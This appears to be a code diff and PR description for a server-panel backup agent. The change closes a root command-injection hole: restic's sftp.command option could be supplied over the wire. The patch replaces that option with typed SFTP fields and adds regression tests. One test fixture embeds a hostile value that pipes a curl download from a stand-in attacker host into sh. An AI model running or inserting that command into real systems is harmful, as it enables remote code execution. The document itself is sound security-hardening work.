+				t.Errorf("the only option the agent may emit is sftp.command, got %q", got[0])
+			}
+		})
+	}
+}
+
+// A request carrying the old field — from a stale panel, or an attacker
+// probing the endpoint — must have NO effect on the restic invocation.
+func TestWireExtraOptionsAreIgnored(t *testing.T) {
+	t.Parallel()
+
+	const hostile = `{
+	  "repo_url": "sftp:u@h:/p",
+	  "extra_options": ["sftp.command=/bin/sh -c 'curl evil.example/x|sh'"],
+	  "sftp": {"host":"h","user":"u","path":"/p","port":2222}
+	}`
+
+	var req struct {
+		RepoURL string            `json:"repo_url"`
+		SFTP    *backupSFTPInputs `json:"sftp,omitempty"`
+	}
+	if err := json.Unmarshal([]byte(hostile), &req); err != nil {
+		t.Fatalf("unmarshal: %v", err)
+	}
+
+	cfg, err := bkResticConfigWithPassword(req.RepoURL, "", "", req.SFTP)
+	if err != nil {
+		t.Fatalf("config: %v", err)
+	}
+	for _, opt := range cfg.ExtraOptions {
+		if strings.Contains(opt, "curl") || strings.Contains(opt, "evil.example") {
+			t.Fatalf("caller-supplied command reached restic's argv: %q", opt)
+		}
+		if !strings.HasPrefix(opt, "sftp.command=") {
+			t.Errorf("unexpected option %q — only agent-built sftp.command is allowed", opt)
+		}
+	}
+	// The typed field still has to work: port 2222 needs an override.
+	if len(cfg.ExtraOptions) != 1 {
+		t.Fatalf("expected exactly the agent-built option for port 2222, got %q", cfg.ExtraOptions)
+	}
+	if !strings.Contains(cfg.ExtraOptions[0], "2222") {
+		t.Errorf("agent-built option lost the typed port: %q", cfg.ExtraOptions[0])
+	}
+}

--- a/panel-agent/internal/commands/backup_system.go
+++ b/panel-agent/internal/commands/backup_system.go
@@ -55,11 +55,10 @@ type systemBackupParams struct {
 	// ScheduleID is the originating backup_schedules.id when the job
 	// came from the scheduler. Empty for manual admin-create jobs.
 	ScheduleID string `json:"schedule_id,omitempty"`
-	// RepoURL + CredentialsRef + ExtraOptions select the destination
+	// RepoURL + CredentialsRef + SFTP select the destination
 	// repo per ADR-0080. Empty = legacy local repo.
 	RepoURL         string            `json:"repo_url,omitempty"`
 	CredentialsRef  string            `json:"credentials_ref,omitempty"`
-	ExtraOptions    []string          `json:"extra_options,omitempty"`
 	DestinationKind string            `json:"destination_kind,omitempty"`
 	SFTP            *backupSFTPInputs `json:"sftp,omitempty"`
 }
@@ -97,11 +96,11 @@ func runSystemBackupOrchestrator(ctx context.Context, req systemBackupParams) er
 	jl := backup.NewJobLogger(req.JobID)
 	defer jl.Close()
 	jl.Printf("system_backup start include_accounts=%v destination=%s", req.IncludeAccounts, req.RepoURL)
-	if err := bkEnsureRepoReady(ctx, req.RepoURL, req.CredentialsRef, req.DestinationKind, req.SFTP, req.ExtraOptions); err != nil {
+	if err := bkEnsureRepoReady(ctx, req.RepoURL, req.CredentialsRef, req.DestinationKind, req.SFTP); err != nil {
 		jl.Printf("ensure_repo_failed=%v", err)
 		return fmt.Errorf("ensure repo: %w", err)
 	}
-	cfg, cerr := bkResticConfig(req.RepoURL, req.CredentialsRef, req.ExtraOptions)
+	cfg, cerr := bkResticConfig(req.RepoURL, req.CredentialsRef, req.SFTP)
 	if cerr != nil {
 		return fmt.Errorf("restic config: %w", cerr)
 	}
@@ -249,10 +248,10 @@ func systemBackupCancelHandler(ctx context.Context, raw json.RawMessage) (any, e
 // snapshot from a real list instead of typing a ULID.
 func systemRestoreListManifestsHandler(ctx context.Context, raw json.RawMessage) (any, error) {
 	var req struct {
-		RepoURL        string   `json:"repo_url"`
-		CredentialsRef string   `json:"credentials_ref,omitempty"`
-		PasswordFile   string   `json:"password_file,omitempty"`
-		ExtraOptions   []string `json:"extra_options,omitempty"`
+		RepoURL        string            `json:"repo_url"`
+		CredentialsRef string            `json:"credentials_ref,omitempty"`
+		PasswordFile   string            `json:"password_file,omitempty"`
+		SFTP           *backupSFTPInputs `json:"sftp,omitempty"`
 	}
 	if err := json.Unmarshal(raw, &req); err != nil {
 		return nil, bkInvalidArg("malformed JSON body")
@@ -260,7 +259,7 @@ func systemRestoreListManifestsHandler(ctx context.Context, raw json.RawMessage)
 	if req.RepoURL == "" {
 		return nil, bkInvalidArg("repo_url required")
 	}
-	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.SFTP)
 	if cerr != nil {
 		return nil, bkInternal("restic config", cerr)
 	}
@@ -328,13 +327,13 @@ func latestSystemManifest(ctx context.Context, c *backup.Client) (string, error)
 // observe restore status interactively without the agent sandbox.
 func systemRestoreHandler(ctx context.Context, raw json.RawMessage) (any, error) {
 	var req struct {
-		JobID              string   `json:"job_id"`
-		ManifestSnapshotID string   `json:"manifest_snapshot_id"`
-		IncludeAccounts    bool     `json:"include_accounts"`
-		RepoURL            string   `json:"repo_url,omitempty"`
-		CredentialsRef     string   `json:"credentials_ref,omitempty"`
-		PasswordFile       string   `json:"password_file,omitempty"`
-		ExtraOptions       []string `json:"extra_options,omitempty"`
+		JobID              string            `json:"job_id"`
+		ManifestSnapshotID string            `json:"manifest_snapshot_id"`
+		IncludeAccounts    bool              `json:"include_accounts"`
+		RepoURL            string            `json:"repo_url,omitempty"`
+		CredentialsRef     string            `json:"credentials_ref,omitempty"`
+		PasswordFile       string            `json:"password_file,omitempty"`
+		SFTP               *backupSFTPInputs `json:"sftp,omitempty"`
 		// Apply, when true, runs the post-stage apply phase: load
 		// panel_db SQL into MariaDB, rsync panel_config to /etc/jabali-panel,
 		// rsync tls to /etc/letsencrypt. Other stages (mail_state,
@@ -353,7 +352,7 @@ func systemRestoreHandler(ctx context.Context, raw json.RawMessage) (any, error)
 		return nil, bkInvalidArg("job_id must be a 26-char ULID")
 	}
 
-	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.ExtraOptions)
+	cfg, cerr := bkResticConfigWithPassword(req.RepoURL, req.CredentialsRef, req.PasswordFile, req.SFTP)
 	if cerr != nil {
 		return nil, bkInternal("restic config", cerr)
 	}
@@ -382,10 +381,10 @@ func systemRestoreHandler(ctx context.Context, raw json.RawMessage) (any, error)
 	}
 
 	out := struct {
-		JobID    string               `json:"job_id"`
-		Stages   []backupRestoreStage `json:"stages"`
-		Applied  []string             `json:"applied,omitempty"`
-		ApplyWarnings []string        `json:"apply_warnings,omitempty"`
+		JobID         string               `json:"job_id"`
+		Stages        []backupRestoreStage `json:"stages"`
+		Applied       []string             `json:"applied,omitempty"`
+		ApplyWarnings []string             `json:"apply_warnings,omitempty"`
 	}{JobID: req.JobID}
 
 	stagingRoot := filepath.Join("/var/lib/jabali-backups/restore-staging", req.JobID)
@@ -469,8 +468,8 @@ func systemRestoreHandler(ctx context.Context, raw json.RawMessage) (any, error)
 // exist (a non-jabali host with the same /etc/jabali-panel layout).
 func resyncDBAccountPasswords(ctx context.Context) ([]string, []string) {
 	type acct struct {
-		mariadbUser string
-		host        string
+		mariadbUser  string
+		host         string
 		passwordFile string
 	}
 	accts := []acct{

--- a/panel-api/cmd/server/account_restore_cmd.go
+++ b/panel-api/cmd/server/account_restore_cmd.go
@@ -410,8 +410,8 @@ func runAccountRestorePrompts(
 	// 2. List manifests via agent.
 	fmt.Fprintln(w, "Listing manifest snapshots (this can take a few seconds for remote dests)…")
 	listParams := map[string]any{
-		"repo_url":      picked.URL,
-		"extra_options": backupwrapperhelpers.ResticOptionsFor(picked),
+		"repo_url": picked.URL,
+		"sftp":     backupwrapperhelpers.SFTPWireParams(picked),
 	}
 	if picked.CredentialsRef != nil {
 		listParams["credentials_ref"] = *picked.CredentialsRef
@@ -551,7 +551,7 @@ func buildRestoreParams(
 		"apply_staged":         applyFlag,
 		"repo_url":             picked.URL,
 		"destination_kind":     picked.Kind,
-		"extra_options":        backupwrapperhelpers.ResticOptionsFor(picked),
+		"sftp":                 backupwrapperhelpers.SFTPWireParams(picked),
 	}
 	if picked.CredentialsRef != nil {
 		params["credentials_ref"] = *picked.CredentialsRef

--- a/panel-api/cmd/server/backup_destination_cmd.go
+++ b/panel-api/cmd/server/backup_destination_cmd.go
@@ -430,8 +430,8 @@ func newBackupDestinationTestCmd() *cobra.Command {
 				return nil
 			}
 			params := map[string]any{
-				"url":           d.URL,
-				"extra_options": backupwrapperhelpers.ResticOptionsFor(d),
+				"url":  d.URL,
+				"sftp": backupwrapperhelpers.SFTPWireParams(d),
 			}
 			if d.CredentialsRef != nil {
 				params["credentials_ref"] = *d.CredentialsRef

--- a/panel-api/cmd/server/system_restore_cmd.go
+++ b/panel-api/cmd/server/system_restore_cmd.go
@@ -37,7 +37,9 @@ func newSystemRestoreCmd() *cobra.Command {
 	var (
 		remoteURL    string
 		credsRef     string
-		extraOpts    []string
+		sftpPort     int
+		sftpAuth     string
+		sftpKeyPath  string
 		passwordFile string
 		passwordCLI  string
 		snapshot     string
@@ -71,7 +73,7 @@ the running panel.`,
 			useInteractive := interactive || (remoteURL == "" && term.IsTerminal(int(os.Stdin.Fd())))
 			if useInteractive {
 				if err := runInteractiveRestorePrompts(cmd.OutOrStdout(),
-					&remoteURL, &credsRef, &extraOpts, &passwordCLI,
+					&remoteURL, &credsRef, &sftpPort, &sftpAuth, &sftpKeyPath, &passwordCLI,
 					&snapshot, &applyStages, &includeAccts, &apply, &force); err != nil {
 					return err
 				}
@@ -143,7 +145,7 @@ the running panel.`,
 				"repo_url":             remoteURL,
 				"credentials_ref":      credsRef,
 				"password_file":        passwordFileForAgent,
-				"extra_options":        extraOpts,
+				"sftp":                 sftpWireFromURL(remoteURL, sftpPort, sftpAuth, sftpKeyPath),
 				"apply":                apply,
 				"apply_stages":         applyStages,
 			}
@@ -163,7 +165,16 @@ the running panel.`,
 	}
 	cmd.Flags().StringVar(&remoteURL, "remote-url", "", "restic repo URL or local path (e.g. sftp:user@host:/path)")
 	cmd.Flags().StringVar(&credsRef, "credentials-ref", "", "absolute path to env file with backend creds (root:root 0600)")
-	cmd.Flags().StringSliceVar(&extraOpts, "extra-option", nil, "restic -o KEY=VALUE flag body (repeatable)")
+	// JAB-194: --extra-option used to take a raw restic `-o KEY=VALUE` body and
+	// hand it to the agent, which passed it straight into restic's argv. One of
+	// those keys, sftp.command, is the command restic EXECUTES to reach an SFTP
+	// backend, so the wire field was arbitrary command execution as root. The
+	// agent no longer accepts it; these typed flags carry the same capability
+	// (non-default port, explicit key, password auth) and the agent builds the
+	// option itself.
+	cmd.Flags().IntVar(&sftpPort, "sftp-port", 0, "SFTP port when not 22")
+	cmd.Flags().StringVar(&sftpAuth, "sftp-auth", "", "SFTP auth mode: key | password (default: ssh config)")
+	cmd.Flags().StringVar(&sftpKeyPath, "sftp-key", "", "absolute path to the SSH private key for SFTP")
 	cmd.Flags().StringVar(&passwordFile, "password-file", "", "restic password file (default: /etc/jabali-panel/restic-repo.password)")
 	cmd.Flags().StringVar(&passwordCLI, "password", "", "restic password (literal; overrides --password-file). Avoid in shell history; prefer --interactive")
 	cmd.Flags().StringVar(&snapshot, "snapshot", "", "system_manifest snapshot ID, or 'latest' to auto-pick newest")
@@ -203,7 +214,9 @@ func writeTempPassword(pw string) (string, error) {
 func runInteractiveRestorePrompts(
 	w io.Writer,
 	remoteURL, credsRef *string,
-	extraOpts *[]string,
+	sftpPort *int,
+	sftpAuth *string,
+	sftpKeyPath *string,
 	passwordCLI, snapshot *string,
 	applyStages *[]string,
 	includeAccts, apply, force *bool,
@@ -253,19 +266,38 @@ func runInteractiveRestorePrompts(
 		}
 	}
 
-	// Optional extra-options (single line, comma-separated; mostly
-	// for SFTP non-default ports/keys when the dest doesn't already
-	// have them encoded server-side).
-	if len(*extraOpts) == 0 {
-		val, err := promptLine(w, r, "Extra restic -o flags (comma-separated, blank to skip): ")
+	// SFTP transport details, asked only when the repo actually is SFTP.
+	// Typed rather than a free-form `-o` line (JAB-194): the agent builds the
+	// sftp.command option from these, so nothing the operator types here ever
+	// becomes a command the agent executes.
+	if strings.HasPrefix(strings.TrimSpace(*remoteURL), "sftp:") && *sftpPort == 0 && *sftpAuth == "" {
+		portStr, err := promptLine(w, r, "SFTP port (blank = 22): ")
 		if err != nil {
 			return err
 		}
-		for _, p := range strings.Split(strings.TrimSpace(val), ",") {
-			p = strings.TrimSpace(p)
-			if p != "" {
-				*extraOpts = append(*extraOpts, p)
+		if v := strings.TrimSpace(portStr); v != "" {
+			n, cerr := strconv.Atoi(v)
+			if cerr != nil || n < 1 || n > 65535 {
+				return fmt.Errorf("invalid SFTP port %q", v)
 			}
+			*sftpPort = n
+		}
+		auth, err := promptLine(w, r, "SFTP auth (key / password, blank = ssh config): ")
+		if err != nil {
+			return err
+		}
+		switch v := strings.ToLower(strings.TrimSpace(auth)); v {
+		case "", "key", "password":
+			*sftpAuth = v
+		default:
+			return fmt.Errorf("invalid SFTP auth %q — use key or password", v)
+		}
+		if *sftpAuth == "key" {
+			keyPath, err := promptLine(w, r, "SSH private key path (blank = ssh default): ")
+			if err != nil {
+				return err
+			}
+			*sftpKeyPath = strings.TrimSpace(keyPath)
 		}
 	}
 
@@ -286,7 +318,7 @@ func runInteractiveRestorePrompts(
 			"repo_url":        *remoteURL,
 			"credentials_ref": *credsRef,
 			"password_file":   tmp,
-			"extra_options":   *extraOpts,
+			"sftp":            sftpWireFromURL(*remoteURL, *sftpPort, *sftpAuth, *sftpKeyPath),
 		}
 		raw, err := ag.Call(ctx, "system.restore_list_manifests", listParams)
 		if err != nil {
@@ -377,7 +409,9 @@ func runInteractiveRestorePrompts(
 	fmt.Fprintln(w, "─── Summary ───")
 	fmt.Fprintf(w, "  remote URL:    %s\n", *remoteURL)
 	fmt.Fprintf(w, "  creds file:    %s\n", strOrPlaceholder(*credsRef, "(none)"))
-	fmt.Fprintf(w, "  extra opts:    %v\n", *extraOpts)
+	if *sftpPort != 0 || *sftpAuth != "" {
+		fmt.Fprintf(w, "  sftp:          port=%d auth=%s key=%s\n", *sftpPort, *sftpAuth, *sftpKeyPath)
+	}
 	fmt.Fprintf(w, "  snapshot:      %s\n", *snapshot)
 	fmt.Fprintf(w, "  apply stages:  %v\n", *applyStages)
 	fmt.Fprintf(w, "  include accts: %v\n", *includeAccts)
@@ -425,4 +459,43 @@ func strOrPlaceholder(s, fallback string) string {
 		return fallback
 	}
 	return s
+}
+
+// sftpWireFromURL builds the typed `sftp` block for an agent restore request.
+//
+// JAB-194: the agent no longer accepts a pre-built `-o sftp.command=...` string
+// — that option is the command restic EXECUTES to reach the backend, so
+// carrying it over the wire handed anything that could reach the agent
+// arbitrary command execution as root. The agent builds it from these fields
+// instead, so nothing an operator types becomes a command.
+//
+// Host/user/path come from the repo URL the operator already supplied
+// (`sftp:user@host:/path`); port, auth mode and key path are the parts that URL
+// cannot express. Returns nil for a non-SFTP repo or one needing no override,
+// which the agent reads as "plain ssh defaults".
+func sftpWireFromURL(remoteURL string, port int, auth, keyPath string) map[string]any {
+	rest, ok := strings.CutPrefix(strings.TrimSpace(remoteURL), "sftp:")
+	if !ok {
+		return nil
+	}
+	if port == 0 && auth == "" && keyPath == "" {
+		return nil // default port, default key, ssh config decides
+	}
+	var user, host, path string
+	if at := strings.Index(rest, "@"); at >= 0 {
+		user, rest = rest[:at], rest[at+1:]
+	}
+	if colon := strings.Index(rest, ":"); colon >= 0 {
+		host, path = rest[:colon], rest[colon+1:]
+	} else {
+		host = rest
+	}
+	return map[string]any{
+		"host":     host,
+		"user":     user,
+		"port":     port,
+		"path":     path,
+		"auth":     auth,
+		"key_path": keyPath,
+	}
 }

--- a/panel-api/internal/api/backup_destinations.go
+++ b/panel-api/internal/api/backup_destinations.go
@@ -470,7 +470,7 @@ func (h *backupDestinationHandler) test(c *gin.Context) {
 	payload := map[string]any{
 		"url":             d.URL,
 		"credentials_ref": credsRef,
-		"extra_options":   backupwrapperhelpers.ResticOptionsFor(d),
+		"sftp":            backupwrapperhelpers.SFTPWireParams(d),
 	}
 	if d.Kind == models.BackupDestinationKindSFTP {
 		if s := d.ExtraOptionsTyped().SFTP; s != nil {

--- a/panel-api/internal/api/backups.go
+++ b/panel-api/internal/api/backups.go
@@ -343,7 +343,7 @@ func destWireParams(d *models.BackupDestination) map[string]any {
 	out := map[string]any{
 		"repo_url":         d.URL,
 		"destination_kind": d.Kind,
-		"extra_options":    backupwrapperhelpers.ResticOptionsFor(d),
+		"sftp":             backupwrapperhelpers.SFTPWireParams(d),
 	}
 	if d.CredentialsRef != nil {
 		out["credentials_ref"] = *d.CredentialsRef

--- a/panel-api/internal/backupfinalizer/finalizer.go
+++ b/panel-api/internal/backupfinalizer/finalizer.go
@@ -7,11 +7,11 @@
 // on that destination's repo, the job is succeeded full-stop.
 //
 // Finalizer responsibilities:
-//   1. List backup_jobs.status='running'.
-//   2. For each, ask the agent if the manifest snapshot exists on
-//      the destination's repo.
-//   3. If yes -> mark succeeded.
-//   4. If running >4h -> mark failed (safety timeout).
+//  1. List backup_jobs.status='running'.
+//  2. For each, ask the agent if the manifest snapshot exists on
+//     the destination's repo.
+//  3. If yes -> mark succeeded.
+//  4. If running >4h -> mark failed (safety timeout).
 package backupfinalizer
 
 import (
@@ -129,7 +129,7 @@ func (f *Finalizer) checkOne(ctx context.Context, j models.BackupJob) {
 		dest, err := f.deps.Destinations.Get(ctx, *j.DestinationID)
 		if err == nil && dest != nil {
 			statusParams["repo_url"] = dest.URL
-			statusParams["extra_options"] = backupwrapperhelpers.ResticOptionsFor(dest)
+			statusParams["sftp"] = backupwrapperhelpers.SFTPWireParams(dest)
 			if dest.CredentialsRef != nil {
 				statusParams["credentials_ref"] = *dest.CredentialsRef
 			}

--- a/panel-api/internal/backupscheduler/scheduler.go
+++ b/panel-api/internal/backupscheduler/scheduler.go
@@ -747,7 +747,7 @@ func destWireParams(d *models.BackupDestination) map[string]any {
 	out := map[string]any{
 		"repo_url":         d.URL,
 		"destination_kind": d.Kind,
-		"extra_options":    backupwrapperhelpers.ResticOptionsFor(d),
+		"sftp":             backupwrapperhelpers.SFTPWireParams(d),
 	}
 	if d.CredentialsRef != nil {
 		out["credentials_ref"] = *d.CredentialsRef

--- a/panel-api/internal/backupwrapperhelpers/helpers.go
+++ b/panel-api/internal/backupwrapperhelpers/helpers.go
@@ -9,9 +9,43 @@ import (
 	"git.jabali-panel.com/shukivaknin/jabali2/panel-api/internal/models"
 )
 
+// SFTPWireParams returns the TYPED SFTP inputs to send to the agent, or nil
+// for a destination that needs none.
+//
+// SECURITY (JAB-194): agent requests carry these fields, never a pre-built
+// `-o sftp.command=...` string. That option is the command restic executes to
+// reach an SFTP backend, so shipping it as an opaque string over the wire gave
+// anything that could reach the agent arbitrary command execution as root —
+// and it cannot be made safe by filtering, because the dangerous key is the one
+// we legitimately use. The agent calls SFTPCommandFlag itself from these
+// fields, so no wire value ever becomes an executed command.
+//
+// ResticOptionsFor below still exists for panel-LOCAL restic invocations, where
+// the panel builds argv for a process it runs itself from its own database row.
+func SFTPWireParams(d *models.BackupDestination) map[string]any {
+	if d == nil || d.Kind != models.BackupDestinationKindSFTP {
+		return nil
+	}
+	s := d.ExtraOptionsTyped().SFTP
+	if s == nil {
+		return nil
+	}
+	return map[string]any{
+		"host":     s.Host,
+		"user":     s.User,
+		"port":     s.Port,
+		"path":     s.Path,
+		"auth":     s.Auth,
+		"key_path": s.KeyPath,
+	}
+}
+
 // ResticOptionsFor returns the `-o key=value` flag bodies (without the
 // `-o` prefix; callers prepend) for one destination. Currently only
 // SFTP needs overrides; other backends return an empty slice.
+//
+// For panel-LOCAL restic invocations only. Do NOT put the result in an agent
+// request — see SFTPWireParams (JAB-194).
 func ResticOptionsFor(d *models.BackupDestination) []string {
 	if d == nil {
 		return nil


### PR DESCRIPTION
Ten agent backup commands accepted `extra_options []string` from the request and
passed each entry into restic's argv as `-o <opt>`, unvalidated. One of those
options, **`sftp.command`, is the command restic EXECUTES** to reach an SFTP
backend — so anything that could reach the agent had arbitrary command execution
as root.

## Why an allowlist doesn't fix it

The dangerous key is the one we legitimately use. Any check loose enough to admit
our real value —

```
sftp.command=sshpass -e ssh -o StrictHostKeyChecking=accept-new … -s sftp
```

— is loose enough to admit a hostile one, and scanning it for shell
metacharacters is hopeless when the legitimate value is full of spaces, quotes
and flags. So the wire contract changed instead.

## The change

The panel sends the **typed** SFTP inputs (host/user/port/path/auth/key_path);
the agent calls `backup.SFTPCommandFlag` itself. That removes the primitive
rather than trying to recognise abuse of it — the same shape as
`migration_admin_run.go` taking a `job_id` and deriving the secret path rather
than trusting a supplied one.

- `extra_options` is gone from every agent request struct
- `bkResticConfig` / `bkResticConfigWithPassword` / `bkEnsureRepoReady` take
  `*backupSFTPInputs`; `bkResticOptions` is the single place an option is built
- panel: `SFTPWireParams` replaces `ResticOptionsFor` in all six agent-request
  payloads. `ResticOptionsFor` stays for panel-**local** restic invocations,
  where the panel builds argv for a process it runs itself from its own DB row —
  not a trust boundary
- `backup_dest_testconn.go` carried its own `backupTestSFTPIn`, field-for-field
  identical to `backupSFTPInputs`; collapsed onto the shared type

## The DR CLI had the same primitive

`jabali system restore --extra-option` and its *"Extra restic -o flags"* prompt
fed the same field, with an operator on the other end. Replaced with typed
`--sftp-port` / `--sftp-auth` / `--sftp-key`; the interactive prompt asks for
those and only when the repo URL is actually SFTP, with host/user/path taken
from the URL the operator already supplied. Same capability, no free-form
option. CLI reference golden regenerated.

## Test plan

Tests assert the **absence of the field**, not the rejection of bad input — a
test that feeds a malicious value and checks it's refused would pass just as
happily against a filter that misses one encoding.

- [x] `TestNoAgentBackupStructAcceptsExtraOptions` greps every agent backup
      struct for a free-form option field. **Verified it fails when one is added
      back** (`backup_home.go:62: ExtraOptions []string …`)
- [x] `TestBkResticOptionsMatchesSFTPCommandFlag` pins that the agent produces
      exactly what the panel used to send, so non-default ports, key auth and
      password auth keep working across the contract change
- [x] `TestWireExtraOptionsAreIgnored` feeds a request carrying **both** a
      hostile `extra_options` and a legitimate typed block, and asserts the
      command never reaches restic's argv while the typed port still takes effect
- [x] `go build ./...`, `go vet ./...`, `gofmt` clean on touched files
- [x] Full `panel-agent/...`, `panel-api/...`, `internal/backup/...` green
- [x] Rebased onto `origin/main`, suite re-run after

## Deployment note

panel-api and panel-agent ship as a set in the same release tarball and restart
together, so there's no skew window in practice. A stale panel talking to a new
agent would silently lose SFTP port/key overrides rather than fail loudly —
worth knowing if anyone deploys the two halves separately.